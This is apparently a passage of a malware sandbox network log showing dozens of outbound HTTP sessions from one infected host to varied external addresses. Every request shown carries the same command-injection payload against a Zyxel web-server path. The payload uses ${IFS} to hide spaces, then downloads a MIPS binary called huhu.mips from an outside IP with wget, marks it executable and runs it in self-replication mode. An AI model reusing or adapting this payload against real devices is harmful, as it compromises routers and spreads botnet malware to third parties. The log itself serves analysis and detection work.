                                            Feb 2, 2024 06:21:22.822153091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7052192.168.2.1550040123.196.168.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822169065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7053192.168.2.153832894.109.5.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822240114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7054192.168.2.1538642157.244.165.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822242022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7055192.168.2.1547028120.205.252.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822304964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7056192.168.2.1554578176.232.246.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822339058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7057192.168.2.1549730189.156.131.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822369099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7058192.168.2.156029480.46.106.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822402000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7059192.168.2.1539662217.8.161.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822417974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7060192.168.2.154413847.182.143.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822453976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7061192.168.2.155235084.127.115.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822493076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7062192.168.2.1536574187.41.253.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822514057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7063192.168.2.155326035.123.126.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822546005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7064192.168.2.1538820122.198.85.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822604895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7065192.168.2.1551456113.136.205.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822638988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7066192.168.2.1552724211.42.195.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822678089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7067192.168.2.153769217.18.120.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822704077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7068192.168.2.1540418106.95.119.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822743893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7069192.168.2.1540956103.19.54.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822782040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7070192.168.2.1558924184.234.205.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822801113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7071192.168.2.1544574169.86.72.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822828054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7072192.168.2.154205658.254.22.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822854042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7073192.168.2.155487617.245.83.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822886944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7074192.168.2.153387839.201.108.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822921038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7075192.168.2.1538914105.244.223.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.822959900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7076192.168.2.15359308.252.49.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823000908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7077192.168.2.153552450.246.149.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823034048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7078192.168.2.1558926218.242.130.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823055983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7079192.168.2.1551786216.200.144.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823101044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7080192.168.2.155979058.127.44.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823131084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7081192.168.2.1551548119.178.243.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823165894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7082192.168.2.1538190128.140.148.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823193073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7083192.168.2.1558728132.172.22.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823249102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7084192.168.2.1542258139.106.150.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823252916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7085192.168.2.154779023.90.241.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823302984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7086192.168.2.155241886.108.179.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823306084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7087192.168.2.155113023.1.150.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823348045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7088192.168.2.1543308112.233.114.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823400974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7089192.168.2.1557268207.217.17.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823437929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7090192.168.2.1551370181.212.134.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823472023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7091192.168.2.156038497.181.194.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823507071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7092192.168.2.154041670.5.154.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823559046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7093192.168.2.1549028115.54.208.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823594093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7094192.168.2.153432463.39.56.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823621988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7095192.168.2.1552950118.242.113.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823671103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7096192.168.2.1545444159.70.97.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823678017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7097192.168.2.1559098114.11.109.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823705912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7098192.168.2.1557734170.183.226.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823754072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7099192.168.2.153597458.134.170.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823776960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7100192.168.2.1541454123.177.89.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823805094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7101192.168.2.153757898.187.192.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823833942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7102192.168.2.154383234.87.1.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823863029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7103192.168.2.1556350222.130.242.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823914051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7104192.168.2.1540750196.3.33.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823936939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7105192.168.2.153957862.135.241.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.823970079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7106192.168.2.1537942183.238.189.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824008942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7107192.168.2.1557944155.27.163.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824059963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7108192.168.2.153421071.96.157.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824083090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7109192.168.2.1556358190.68.191.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824122906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7110192.168.2.154767442.221.119.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824136972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7111192.168.2.1539588213.6.39.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824188948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7112192.168.2.1554510107.22.111.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824207067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7113192.168.2.153978245.140.32.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824255943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7114192.168.2.1553896117.188.202.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:22.824299097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7115192.168.2.155874695.77.10.191443
                                            TimestampBytes transferredDirectionData
